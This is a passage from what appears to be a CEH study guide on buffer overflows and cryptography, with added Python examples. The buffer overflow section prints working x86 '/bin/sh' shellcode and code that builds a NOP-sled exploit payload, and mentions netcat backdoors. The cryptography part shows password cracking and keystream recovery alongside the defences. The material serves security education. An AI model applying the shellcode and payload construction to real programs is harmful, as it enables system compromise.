To create a buffer overflow the hacker has to have an understanding of the underlying structures such as stack and heap memory processes, system calls at the machine code level, assembly level programming, and knowledge of debugging tools and how higher level programming languages convert into lower level languages.

Knowledge Required to Run a Created Exploit

If a piece of software has a known buffer overflow issue there may already be an exploit tool available. Anyone who can find the tool and the vulnerable software in use can run the exploit.

Smashing the Stack

In general, a buffer overflow allows a hacker to control where the program looks for its next instruction by overwriting the saved return address on the stack and pointing it at code they want to run. This is known as smashing the stack. After the stack is smashed the hacker has the same privileges as the process, and from there may gain super user access. It is also possible to create backdoors using inetd or Trivial FTP, or to make connections using netcat.

Identifying Buffer Overflow Vulnerabilities

Identifying these vulnerabilities is generally done by code review and manual testing. Debugging software such as OllyDbg can be used to feed malformed input to programs and watch exactly how the stack or heap handles the problem.
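The exploit-layout arithmetic behind identifying and smashing a stack buffer overflow, as an added example that is not the guide's code. The target process is replaced by a Python model of one stack frame ([buffer][saved EBP][saved EIP]) filled by an unchecked strcpy; against that model the example crashes the frame with a cyclic pattern, reads the value that lands in EIP, computes the offset of the saved return address, assembles a payload of NOP sled, the guide's shellcode and the return address, and confirms that landing anywhere in the sled slides into the shellcode. The buffer size and every address are assumptions.

```python
# Added example (not from the CEH guide): the layout arithmetic behind finding
# and smashing a stack buffer overflow. The target process is replaced by a
# Python model of one frame; buffer size and addresses are assumed values.
import string
from itertools import product

# The minimal Linux x86 execve("/bin/sh") shellcode quoted in the guide.
SHELLCODE = (b"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
             b"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58")
NOP = 0x90   # x86 one-byte NOP


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique,
    so the bytes that land in EIP identify the offset that put them there."""
    out = bytearray()
    for up, lo, dg in product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out += (up + lo + dg).encode()
        if len(out) >= length:
            return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes repeats")


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Offset in the input that overwrote the saved return address; x86 stores
    the address little-endian, so the debugger's EIP value is reversed first."""
    return pattern.find(eip_value.to_bytes(4, "little"))


def overflow_frame(buf_size: int, data: bytes) -> int:
    """Model of strcpy(buffer, data) into a frame laid out as
    [buffer][saved EBP][saved EIP]; the copy stops only at the first NUL byte.
    Returns the value that will be loaded into EIP when the function returns."""
    frame = bytearray(buf_size + 8)
    frame[buf_size:buf_size + 4] = (0xBFFFF400).to_bytes(4, "little")      # assumed saved EBP
    frame[buf_size + 4:buf_size + 8] = (0x08048500).to_bytes(4, "little")  # assumed saved EIP
    copied = data.split(b"\x00", 1)[0]
    frame[:len(copied)] = copied          # no bounds check: runs past buf_size
    return int.from_bytes(frame[buf_size + 4:buf_size + 8], "little")


def build_payload(ret_offset: int, ret_addr: int, shellcode: bytes = SHELLCODE) -> bytes:
    """[NOP sled][shellcode][return address]: the sled fills whatever space the
    buffer has before the bytes that reach the saved return address."""
    sled_len = ret_offset - len(shellcode)
    if sled_len < 0:
        raise ValueError("buffer too small for this shellcode before the return address")
    return bytes([NOP]) * sled_len + shellcode + ret_addr.to_bytes(4, "little")


def lands_on_shellcode(payload: bytes, sled_len: int, landing_index: int) -> bool:
    """Execution starting at `landing_index`: NOPs slide forward one byte at a
    time; success means reaching byte 0 of the shellcode exactly."""
    i = landing_index
    while 0 <= i < len(payload) and payload[i] == NOP:
        i += 1
    return i == sled_len


def demo(buf_size: int = 64, buffer_addr: int = 0xBFFFF380):
    """Crash with a pattern, read EIP, compute the offset, build the payload,
    then confirm the overwritten EIP points into the sled and slides to the code."""
    pattern = cyclic_pattern(200)
    offset = pattern_offset(pattern, overflow_frame(buf_size, pattern))
    sled_len = offset - len(SHELLCODE)
    ret_addr = buffer_addr + sled_len // 2          # aim for the middle of the sled
    payload = build_payload(offset, ret_addr)
    eip = overflow_frame(buf_size, payload)
    return offset, eip == ret_addr, lands_on_shellcode(payload, sled_len, eip - buffer_addr)


if __name__ == "__main__":
    print(demo())   # (68, True, True): 64-byte buffer + 4-byte saved EBP
```

The offset of 68 for a 64-byte buffer is the saved frame pointer sitting between the buffer and the return address; on a real target the same steps are done with a debugger reading EIP at the crash, and the return address must additionally avoid NUL bytes and survive any transformation the program applies to its input.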


Preventing Buffer Overflow Attacks

The prevention of buffer overflow attacks comes from having programmers who are familiar with what can happen when the stack or heap is left open to these vulnerabilities. By using memory-safe languages, or by making sure not to use unsafe functions (such as strcpy, strcat, sprintf and gets in C) in languages that have them, you can prevent many common overflows. By having a strong code review process after the code is written you can find possible cracks.

Data Execution Prevention (DEP)

DEP is a set of hardware and software technologies that monitor programs and verify in real time whether they are using system memory safely: pages that hold data, such as the stack and heap, are marked non-executable, so injected shellcode placed there cannot be run. DEP is usually combined with stack canaries, which detect an overwritten return address before it is used, and address space layout randomization (ASLR), which makes the addresses an exploit needs unpredictable.

Buffer Overflow Penetration Testing

If the source code is available, review the code for insecure function calls. If the source code is not available, reverse engineering is possible using disassemblers and debugging tools. The process for using the debugger involves sending the program large amounts of input data and watching how the code handles it. Understanding the programming involved is required. As always, documentation of all the findings is critical to a good penetration test.

Module 18 Cryptography

Study Guide Objectives:
. Introduction and Definitions
. Types of Cryptography
. Ciphers
. Algorithms
. Message Hashes / Digests
. Public Key Infrastructure (PKI)
. Disk Encryption
. Cryptography Attacks

Introduction and Definitions

Cryptography is used to make data unreadable; the word literally means "hidden writing". This is usually done by a mathematical algorithm which takes information and turns it into what is called cipher text, a process called encryption. For example, you can rotate the alphabet by thirteen characters so that "computer" becomes "pbzchgre"; each letter is substituted with the letter 13 places further along the alphabet. This very basic method is known as ROT13. The plaintext is "computer", the cipher text is "pbzchgre", and the algorithm is rotating letters 13 places along the alphabet.


Cryptography is used to keep data confidential. In order to create a confidential method, the algorithm used requires a crypto-variable or key. The algorithm itself can be public; the key is the parameter that makes each use of it unique, which allows many users to share a common algorithm while maintaining confidentiality. Instead of ROT13 as above it becomes ROTx, where x, the key, can represent any number of rotations. When someone is authorized to use the encrypted data they are given the keys necessary to decrypt it and view the data.

Cryptography is also used to provide data integrity and non-repudiation. Integrity is the ability to be sure that the data has not been altered. Non-repudiation is the ability to be sure that the data came from a certain source, by attaching a digital fingerprint (a signature) to a message.

Types of Cryptography

Asymmetric

Asymmetric encryption uses one key to encrypt and a different key to decrypt. These are the public and private keys. If something is encrypted with the private key, it can only be decrypted with the public key. If something is encrypted with the public key, it can only be decrypted with the private key. The private key is what the entity keeps private. When the private key is used to encrypt (sign) a message, the result is a digital signature: this provides non-repudiation, because the entities involved know that only the holder of the private key could have produced something that opens with that specific public key. Likewise, a message encrypted with an entity's public key can only be read by the entity with the private key, assuring the parties of confidentiality. It is important to remember that the keys in such a structure cannot feasibly be derived from each other.

Asymmetric encryption is used when a key needs to be transmitted securely and it would be infeasible to do so out of band, such as in email encryption. Because it is far slower than symmetric encryption, in practice it protects a symmetric session key or a message digest rather than the bulk data itself.

Symmetric

Symmetric encryption uses the same key for encryption and decryption. The entities using this key have to take great care in protecting it; anyone with access to this key can read any message that is encrypted with it. This key is usually kept in a secure location and is transferred out of band. Symmetric encryption is faster than asymmetric. IPsec is a good example: it is used for VPN type traffic, which requires a high rate of transmission.

Hash Function

A hash function is a one way method; it does not require a key. It is used to create a fixed-length digest which does not need to be (and cannot be) decrypted. This is used to provide integrity for a file, such as a checksum. A piece of plaintext passed through the algorithm gives a message digest or hash, which can be used to prove that the plaintext is whole, proving integrity.

Ciphers

Block Ciphers

Block ciphers encrypt fixed-size blocks of data, commonly 64 or 128 bits. Some ciphers can only use blocks of certain sizes; others are able to use variable block sizes. The cipher works by breaking the data into blocks of the chosen size, then encrypting each piece; a mode of operation (such as CBC) defines how the blocks are chained together so that identical plaintext blocks do not produce identical cipher text. Block ciphers are commonly used for larger sets of data such as files and disks.


Stream Ciphers

Stream ciphers encrypt continuous streams of data, combining the plaintext with a keystream generated from the key, typically one bit or byte at a time. These are often used in symmetric encryption for data that has to be transmitted quickly. This type of cipher does not require data in blocks of a certain size. A keystream must never be reused for two messages, which is exactly the mistake WEP makes with RC4 (see Module 15).

Algorithms

DES

This block cipher was selected in 1976 and published in 1977 by the U.S. National Bureau of Standards (now NIST) as the Data Encryption Standard, based on an IBM design reviewed by the NSA. DES uses a 64 bit block and a key of 56 bits, thought at the time to be beyond the ability of any computer to brute force and determine the key.

As computer power has increased in the decades since, the 56 bit key is no longer considered secure; a DES key was publicly brute forced in 1998. Triple DES was created by taking the DES cipher algorithm and applying it three times to each data block, with a different key each time. This gives a nominal key length of 168 bits, although the meet-in-the-middle attack reduces its effective strength to about 112 bits.

RC Algorithms

The RC algorithms are a set of symmetric-key encryption algorithms invented by Ron Rivest. RC4 is a widely used stream cipher with a variable key size. RC5 is a block cipher with a variable 32/64/128-bit block size, developed in 1994. RC6 is a 128-bit block cipher based heavily on RC5, created in 1997.

RSA

RSA is a public-key cipher used for both confidentiality and digital signatures, based on the difficulty of factoring the product of two large primes. Keys of at least 2048 bits are expected today, and RSA must be used with a padding scheme (OAEP for encryption, PSS or PKCS#1 v1.5 for signatures), because textbook RSA with no padding is malleable and leaks information.

AES

AES (the Advanced Encryption Standard, FIPS 197, based on the Rijndael cipher) is a symmetric-key block cipher. It uses 128-bit blocks and a key size of 128, 192 or 256 bits. AES is currently considered the standard for secure symmetric encryption.

Message Hashes / Digests

Message digests or message hashes are the output of a one-way hash function applied to a block of data. The output is called a hash value. A good hash function has the avalanche property: if any bit of the original text changes, every bit of the output has a fifty percent chance of changing, so two documents that differ in the slightest detail have unrelated hash values, and finding two inputs with the same hash (a collision) is infeasible. These values are used for verifying file or message integrity. They are also used as identifiers for files, and as stored verifiers for passwords where keeping or transmitting the password itself would be a bad idea; in that use the hash must be salted and computed with a slow, purpose-built password hashing function, because a plain fast hash of a password can be brute-forced offline.

Message Digest Algorithms

MD5

MD stands for Message Digest. MD5 produces a 128-bit digest, normally written as a 32-digit hexadecimal number, that can be used as a digital fingerprint of a file. Practical collision attacks against MD5 were published in 2004, and in 2008 researchers used MD5 collisions to forge a certificate that browsers accepted as a valid certification authority. MD5 must not be used where collision resistance matters, such as in signatures or certificates; it survives mainly as a fast checksum against accidental corruption.

SHA

The Secure Hash Algorithm family was designed by the NSA and published by NIST as a Federal Information Processing Standard (FIPS 180). SHA-1 produces a 160-bit digest and is structurally very similar to MD5; a practical SHA-1 collision was demonstrated in 2017 and it is no longer acceptable for signatures. SHA-2 is built on two core functions: SHA-256, which produces a 256-bit digest and has a truncated variant SHA-224, and SHA-512, which produces a 512-bit digest and has a truncated variant SHA-384. NIST required Federal agencies to stop using SHA-1 for digital signatures and move to SHA-2 functions after 2010.
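The following is an added example, not code from the CEH study guide, showing the three properties the hash section describes: the digest sizes of MD5, SHA-1 and SHA-2, a checksum-style integrity check, and the avalanche effect when a single input bit is flipped. The "file" contents and the tampered copy are constructed for the demonstration.

```python
import hashlib
import hmac

# Constructed sample "file" content for the demonstration (not from the page).
ORIGINAL = b"Quarterly report: revenue 1,250,000; approved by CFO\n"


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Return the hex digest of data, the value a checksum file would record."""
    return hashlib.new(algorithm, data).hexdigest()


def verify_integrity(data: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Recompute the digest and compare it with the stored one.

    compare_digest is used instead of == so the comparison does not leak,
    through its timing, how many leading characters matched."""
    return hmac.compare_digest(digest_hex(data, algorithm), expected_hex)


def digest_bits(algorithm: str) -> int:
    """Output size in bits for the algorithms discussed in the text."""
    return hashlib.new(algorithm).digest_size * 8


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Return a copy of data with exactly one bit inverted."""
    byte_index, bit = divmod(bit_index, 8)
    out = bytearray(data)
    out[byte_index] ^= 1 << bit
    return bytes(out)


def changed_bits(a: bytes, b: bytes) -> int:
    """Hamming distance between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche_fraction(data: bytes, bit_index: int = 0, algorithm: str = "sha256") -> float:
    """Fraction of digest bits that change when one input bit is flipped.
    For a good hash this is close to 0.5 regardless of which bit is flipped."""
    before = hashlib.new(algorithm, data).digest()
    after = hashlib.new(algorithm, flip_bit(data, bit_index)).digest()
    return changed_bits(before, after) / (len(before) * 8)


if __name__ == "__main__":
    for alg in ("md5", "sha1", "sha256", "sha512"):
        print(f"{alg:7} {digest_bits(alg):4} bits  {digest_hex(ORIGINAL, alg)}")
    stored = digest_hex(ORIGINAL)                    # what a checksum file holds
    tampered = ORIGINAL.replace(b"1,250,000", b"1,250,001")
    print("original verifies:", verify_integrity(ORIGINAL, stored))
    print("tampered verifies:", verify_integrity(tampered, stored))
    print("digest bits changed by one flipped input bit:",
          f"{avalanche_fraction(ORIGINAL):.2f}")
```

Changing one digit of the report fails the check, and flipping any single input bit changes roughly half of the digest bits, which is why a digest cannot be adjusted incrementally to match a forged document.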

Examples of Message Digest Uses

SSL and TLS communication between clients and servers uses hash functions throughout the handshake that starts a connection. The client asks the server for a secure connection and presents the list of cipher suites it supports (each suite names a key exchange, a cipher and a hash or MAC). The server chooses the strongest suite both sides support and tells the client. The server then presents its digital certificate, whose signature is a hash of the certificate contents signed by the issuing certification authority. The client verifies that signature against the CA certificates in its trust store and checks that the certificate matches the hostname and has not expired or been revoked. In the RSA key exchange, the client then encrypts a random pre-master secret with the server's public key so that only the server can decrypt it, and both server and client derive the symmetric session keys from that value with a hash-based pseudorandom function. Modern TLS prefers an ephemeral Diffie-Hellman key exchange instead, so that a later compromise of the server's private key does not expose recorded sessions (forward secrecy); TLS 1.3 removed the RSA key exchange entirely.


SSH (Secure Shell) uses public and private keys to authenticate users and to set up a secure tunnel. You generate a key pair using a tool such as ssh-keygen or PuTTYgen. The public key is stored on the SSH server you need to reach (in the user's authorized_keys file); the private key stays on your client, protected by a passphrase. When you log on to the server, it sends data specific to that session; the client hashes it together with its identity, signs the hash with the private key, and presents the signature to the server, which verifies it with the stored public key. Only the holder of the private key could have produced the signature, and the private key is never transmitted.



Public Key Infrastructure (PKI)

PKI refers to all the background parts needed to use digital certificates as a way of binding public keys to the entities that use them.


Registration Authority

This entity handles the requests of an entity (server, computer, or person) to obtain a digital certificate, verifying the requester's identity before the request is passed to the certification authority.

Certification Authority

This entity generates, signs and assigns certificates to entities. Also referred to as a Trusted Third Party (TTP).

Validation Authority

This entity handles requests to confirm that a presented digital certificate is genuine and still valid, for example by publishing certificate revocation lists (CRLs) or answering OCSP queries.

In some systems these roles may all be provided by one server. The term PKI is sometimes used incorrectly to refer only to the Certification Authority (CA). The term digital certificate refers to the X.509 standard document used in PKI, which binds a public key to a subject name and is signed by the issuing CA.


Examples of commercial Certification Authorities include VeriSign, Go Daddy, and Comodo.

PKI can also exist in a Web of Trust model, as implemented in Pretty Good Privacy (PGP) and its free implementations of email encryption. In a web of trust there is no central CA: users sign each other's keys, and a key is trusted to the extent that it has been signed by keys the user already trusts. Such self-signed certificates can be used alongside the commercial model only if a certification authority is willing to back them as authentic by signing them.

Uses of PKI

PKI is used in both encrypted email and encrypted web traffic. In email encryption, the message is run through a hash function, which creates a hash value unique to the message. The sender encrypts that hash value with their private key and attaches the result to the message as a digital signature. The message itself is encrypted with the recipient's public key, so that it can only be decrypted by that recipient using their private key, ensuring confidentiality. When the message is decrypted, the recipient decrypts the signature with the sender's public key, recomputes the hash of the received message and compares the two; a match proves the integrity of the email and that it came from the holder of the sender's private key.

In web traffic such as SSL and TLS, websites are issued certificates by certification authorities, which they present during the handshake to identify themselves to clients.
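As an added example, not code from the study guide, the signing flow just described for email (and the same operation SSH performs over a per-session challenge, and a CA performs over certificate contents) is worked through with textbook RSA: hash the message, raise the digest to the private exponent, and let the recipient check it with the public exponent. The two fixed Mersenne primes, the sample email and the tampered copy are constructed for the demonstration; real keys are random primes of about 1024 bits each and real signatures add a padding scheme such as PSS, so this block illustrates the mathematics only and is not a secure implementation. It needs Python 3.8 or later for the three-argument pow used to compute the private exponent.

```python
import hashlib

# Two Mersenne primes (2**521 - 1 and 2**127 - 1), fixed so the example is
# reproducible. Real keys use two random primes of about 1024 bits each.
P = 2**521 - 1
Q = 2**127 - 1
E = 65537   # the usual public exponent; coprime with (P-1)*(Q-1) here


def generate_keypair():
    """Return ((n, e), (n, d)): the public key and the private key."""
    n = P * Q
    phi = (P - 1) * (Q - 1)
    d = pow(E, -1, phi)            # private exponent: E * d == 1 (mod phi)
    return (n, E), (n, d)


def message_digest(message: bytes) -> int:
    """SHA-256 of the message as an integer. It is 256 bits, always < n."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign(message: bytes, private_key) -> int:
    """Sender: encrypt the digest with the private exponent, s = h**d mod n."""
    n, d = private_key
    return pow(message_digest(message), d, n)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Recipient: decrypt the signature with the public exponent and compare it
    with a fresh digest of the received message, s**e mod n == SHA-256(m)."""
    n, e = public_key
    return pow(signature, e, n) == message_digest(message)


def demo():
    """Signed-email flow. Returns (genuine verifies, tampered copy verifies)."""
    public_key, private_key = generate_keypair()
    # Constructed sample message; the signature is computed by the sender.
    message = (b"From: alice@example.com\r\nSubject: wire transfer\r\n\r\n"
               b"Please send 5,000 EUR to account 1234.")
    signature = sign(message, private_key)
    # An attacker in transit changes the account number but cannot re-sign.
    tampered = message.replace(b"1234", b"9999")
    return verify(message, signature, public_key), verify(tampered, signature, public_key)


if __name__ == "__main__":
    genuine_ok, tampered_ok = demo()
    print("genuine message verifies:", genuine_ok)     # True
    print("tampered message verifies:", tampered_ok)   # False
```

The recipient never needs the private key: the public exponent recovers the digest the sender signed, and any change to the message changes the freshly computed digest so the comparison fails.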

Disk Encryption

Disk encryption refers to encrypting the data on a hard drive or other media. When the data in storage is encrypted it assures the confidentiality of the data if the device is lost, stolen or disposed of; it protects nothing while the volume is mounted and the system is running. One best practice is to encrypt all data backups when they are put onto removable media such as DVD or tape, and to keep the keys separate from the media.

Our practice uses the free tool TrueCrypt for disk encryption. TrueCrypt also has the ability to create a hidden volume within an encrypted volume for plausible deniability; the hidden volume cannot be distinguished from the random filler of the outer volume unless the hidden volume passphrase is supplied. Note that TrueCrypt development ended in 2014 and the tool is no longer maintained; the actively maintained fork VeraCrypt, or the operating system's native disk encryption (BitLocker, FileVault, LUKS), should be used instead.

Cryptography Attacks

All cryptographic attacks assume that the attacker has access to the encrypted information; they differ in what else the attacker has or can do.

Brute force attacks try every possible key (or password) for the cryptographic function. Success depends on how long the key is, how much time and hardware the attacker has, and what other security mechanisms are in place, such as account lockout. Lockout only helps against online guessing; once an attacker has stolen the password hashes, guessing is offline and unlimited. Rainbow tables speed up offline cracking by precomputing hash values once and reusing them against every stolen hash. A random per-user salt defeats that precomputation, and a deliberately slow hash such as PBKDF2, bcrypt or scrypt limits how many guesses per second the attacker can make.
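The following is an added example, not code from the study guide. It runs the offline attacks the paragraph describes against an unsalted MD5 password hash (a dictionary attack, exhaustive brute force over a small alphabet, and a precomputed hash-to-password lookup table standing in for a rainbow table), then stores the same password with a random salt and PBKDF2-HMAC-SHA256 to show why the lookup table no longer applies. The wordlist and passwords are constructed for the demonstration.

```python
import hashlib
import hmac
import itertools
import os
import string
from typing import Optional

# Constructed wordlist for the demonstration, not taken from any real system.
WORDLIST = ["password", "letmein", "qwerty", "summer2011", "Admin123", "dragon"]


def md5_hex(s: str) -> str:
    """Unsalted MD5 of a password: fast to compute, which helps the attacker."""
    return hashlib.md5(s.encode()).hexdigest()


def dictionary_attack(target_hex: str, wordlist) -> Optional[str]:
    """Try each candidate word against a stolen unsalted hash."""
    for word in wordlist:
        if md5_hex(word) == target_hex:
            return word
    return None


def brute_force(target_hex: str, alphabet: str, max_len: int) -> Optional[str]:
    """Exhaustively try every string up to max_len over the alphabet.
    Cost grows as len(alphabet) ** length, which is why length matters."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if md5_hex(candidate) == target_hex:
                return candidate
    return None


def build_lookup_table(wordlist) -> dict:
    """Precomputed hash -> password table. Real rainbow tables compress this
    with hash chains, but the attack is the same: one lookup per stolen hash,
    and the work is done once for every hash the attacker will ever steal."""
    return {md5_hex(w): w for w in wordlist}


def store_password(password: str, iterations: int = 200_000):
    """Defence: a random 16-byte salt per user plus a slow KDF. The salt is
    stored beside the result; it is not secret, it only prevents precomputation."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, key


def check_password(password: str, salt: bytes, iterations: int, key: bytes) -> bool:
    """Verify a login attempt by recomputing the KDF with the stored salt."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, key)


def lookup_table_defeated(password: str, iterations: int = 200_000) -> bool:
    """Two users with the same password get different stored values, so a
    table keyed on the hash of the password alone can never match either."""
    _, _, key_a = store_password(password, iterations)
    _, _, key_b = store_password(password, iterations)
    table = build_lookup_table(WORDLIST)
    return key_a != key_b and key_a.hex() not in table and key_b.hex() not in table


if __name__ == "__main__":
    stolen = md5_hex("letmein")                       # constructed stolen hash
    print("dictionary:", dictionary_attack(stolen, WORDLIST))
    print("lookup table:", build_lookup_table(WORDLIST).get(stolen))
    print("brute force:", brute_force(md5_hex("zap"), string.ascii_lowercase, 3))
    print("salted+slow hash defeats precomputation:", lookup_table_defeated("letmein"))
```

The unsalted hash falls to a single dictionary pass or one table lookup; with a salt every user's hash must be attacked separately from scratch, and the iteration count makes each guess cost hundreds of thousands of hash operations instead of one.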



Known plaintext attacks are those where the attacker has some plaintext together with the corresponding ciphertext. The algorithm is normally assumed to be public (Kerckhoffs's principle), so the goal is not to discover the algorithm but to recover the key, or enough of the keystream, to decrypt other messages encrypted under the same key. Stream ciphers whose keystream has been reused are a classic victim.
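As an added example, not code from the study guide, this block serves both the stream cipher description earlier in the section and the known plaintext attack just described. It builds a counter-mode stream cipher whose keystream comes from HMAC-SHA256 (a demonstration construction with the same shape as CTR mode or ChaCha20, not a standard cipher), encrypts two messages under the same key and nonce, and shows that one known plaintext/ciphertext pair yields the keystream and therefore the other message. The key, nonce and HTTP requests are constructed for the demonstration.

```python
import hashlib
import hmac

# Constructed demo key; in practice it comes from a key exchange or a KDF.
KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f")


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: block i = HMAC-SHA256(key, nonce || i).
    Demonstration construction only; use AES-CTR or ChaCha20 in real code."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def stream_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Stream cipher: ciphertext = plaintext XOR keystream. No padding needed."""
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


# XOR is its own inverse, so decryption is the same operation.
stream_decrypt = stream_encrypt


def recover_keystream(known_plaintext: bytes, known_ciphertext: bytes) -> bytes:
    """Known-plaintext attack on a stream cipher: P XOR C gives the keystream,
    with no knowledge of the key."""
    return xor_bytes(known_plaintext, known_ciphertext)


def attack_reused_nonce(known_plaintext: bytes, known_ciphertext: bytes,
                        victim_ciphertext: bytes) -> bytes:
    """If the same key and nonce were reused for a second message, the
    recovered keystream decrypts it as far as the two messages overlap."""
    return xor_bytes(victim_ciphertext, recover_keystream(known_plaintext, known_ciphertext))


def demo():
    """Returns (recovery with nonce reuse, attempted recovery with a fresh nonce)."""
    nonce = b"\x00" * 12
    known = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
    secret = b"GET /admin?token=s3cr3t HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
    c_known = stream_encrypt(KEY, nonce, known)
    c_secret_reused = stream_encrypt(KEY, nonce, secret)          # the bug: same nonce
    c_secret_fresh = stream_encrypt(KEY, b"\x01" * 12, secret)    # correct: new nonce
    return (attack_reused_nonce(known, c_known, c_secret_reused),
            attack_reused_nonce(known, c_known, c_secret_fresh))


if __name__ == "__main__":
    reused, fresh = demo()
    print("with nonce reuse:", reused)      # starts with GET /admin?token=s3cr3t
    print("with fresh nonce:", fresh)       # unrelated bytes
```

The attacker never learns the key: the known request cancels the keystream out of the first ciphertext, and because the second message was encrypted under the same keystream the token in it is exposed. Changing the nonce per message, as every stream cipher requires, makes the recovered keystream useless against the second ciphertext.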

Chosen plaintext attacks occur when the attacker can choose pieces of plaintext and has access to the encryption function, for example through a service that encrypts user-supplied data under a key the attacker does not know. By comparing the chosen plaintext with the ciphertext it produces, the attacker tries to learn the key or to find structure in the cipher; a deterministic cipher such as a block cipher in ECB mode gives away whether two chosen inputs are equal.


Chosen ciphertext attacks occur when the attacker can submit ciphertext of their choosing to be decrypted and analyse the output, or merely observe whether decryption succeeded. This is similar to a newspaper cryptogram puzzle in which you know how the message is constructed and can test guesses against it. Padding oracle attacks on CBC mode are a practical example: an error that reveals whether the padding of a modified ciphertext was valid lets the attacker decrypt a message one byte at a time without the key.


While attacks against the ciphers themselves do occur, it is usually quicker to attack the implementation or the person using the encryption instead. Attacks on the implementation that exploit information leaked through timing, power consumption, electromagnetic emissions, cache behaviour or error messages are called side channel attacks. Attacks on the person are social engineering.

Social engineering attacks such as phishing or shoulder surfing can give an attacker the passwords or keys used for encryption by taking advantage of the users rather than of the cryptography.

Rubber hose attacks refer to using physical violence, or the threat of it, against someone who knows the encryption keys in order to force them to reveal those keys. Hidden volumes with plausible deniability exist partly to address this threat.